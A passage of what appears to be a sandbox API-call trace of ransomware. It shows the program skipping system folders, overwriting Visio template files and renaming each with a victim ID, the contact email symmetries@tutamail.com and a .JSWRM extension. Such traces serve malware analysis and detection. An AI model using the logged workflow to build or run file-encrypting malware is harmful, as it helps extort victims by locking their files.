dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0146.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0146.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0146.128] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x241fff6, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x241fff6, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x241fff6, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6d74, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BSTORM_U.VSSX", cAlternateFileName="BSTORM~1.VSS")) returned 1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2=".") returned 1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="..") returned 1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="...") returned 1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="windows") returned -1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="recovery") returned -1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="perflogs") returned -1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="documents and settings") returned -1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="system volume information") returned -1 [0146.128] lstrcmpiW (lpString1="BSTORM_U.VSSX", lpString2="msocache") returned -1 [0146.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0146.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0146.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0146.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0146.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0146.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0146.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0146.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.130] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=28020) returned 1 [0146.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6d70) returned 0x27b348 [0146.130] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6d70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6d70, lpOverlapped=0x0) returned 1 [0146.134] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.134] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6d70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6d70, lpOverlapped=0x0) returned 1 [0146.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.134] CloseHandle (hObject=0x314) returned 1 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0146.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0146.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0146.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0146.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0146.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0146.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0146.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0146.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0146.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0146.135] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6b35, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BSTORM_U.VSTX", cAlternateFileName="BSTORM~2.VST")) returned 1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2=".") returned 1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="..") returned 1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="...") returned 1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="windows") returned -1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="recovery") returned -1 [0146.135] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="perflogs") returned -1 [0146.136] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="documents and settings") returned -1 [0146.136] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.136] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="system volume information") returned -1 [0146.136] lstrcmpiW (lpString1="BSTORM_U.VSTX", lpString2="msocache") returned -1 [0146.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0146.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0146.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0146.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0146.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.137] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27445) returned 1 [0146.137] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b30) returned 0x27b348 [0146.138] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6b30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6b30, lpOverlapped=0x0) returned 1 [0146.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.141] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6b30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6b30, lpOverlapped=0x0) returned 1 [0146.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.141] CloseHandle (hObject=0x314) returned 1 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0146.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0146.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0146.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0146.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0146.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0146.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0146.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0146.142] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c1d957, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c1d957, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c1d957, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3230c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BTHKT_M.VSSX", cAlternateFileName="BTHKT_~3.VSS")) returned 1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2=".") returned 1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="..") returned 1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="...") returned 1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="windows") returned -1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="recovery") returned -1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="perflogs") returned -1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="documents and settings") returned -1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="system volume information") returned -1 [0146.143] lstrcmpiW (lpString1="BTHKT_M.VSSX", lpString2="msocache") returned -1 [0146.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0146.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0146.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0146.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0146.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.144] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=205580) returned 1 [0146.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0146.145] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.159] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.160] CloseHandle (hObject=0x314) returned 1 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0146.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0146.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0146.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0146.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0146.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0146.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0146.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.160] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0146.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0146.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0146.161] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x339f393, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x339f393, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x339f393, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x31c38, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BTHKT_U.VSSX", cAlternateFileName="BTHKT_~2.VSS")) returned 1 [0146.161] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2=".") returned 1 [0146.161] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="..") returned 1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="...") returned 1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="windows") returned -1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="recovery") returned -1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="perflogs") returned -1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="documents and settings") returned -1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", lpString2="system volume information") returned -1 [0146.162] lstrcmpiW (lpString1="BTHKT_U.VSSX", 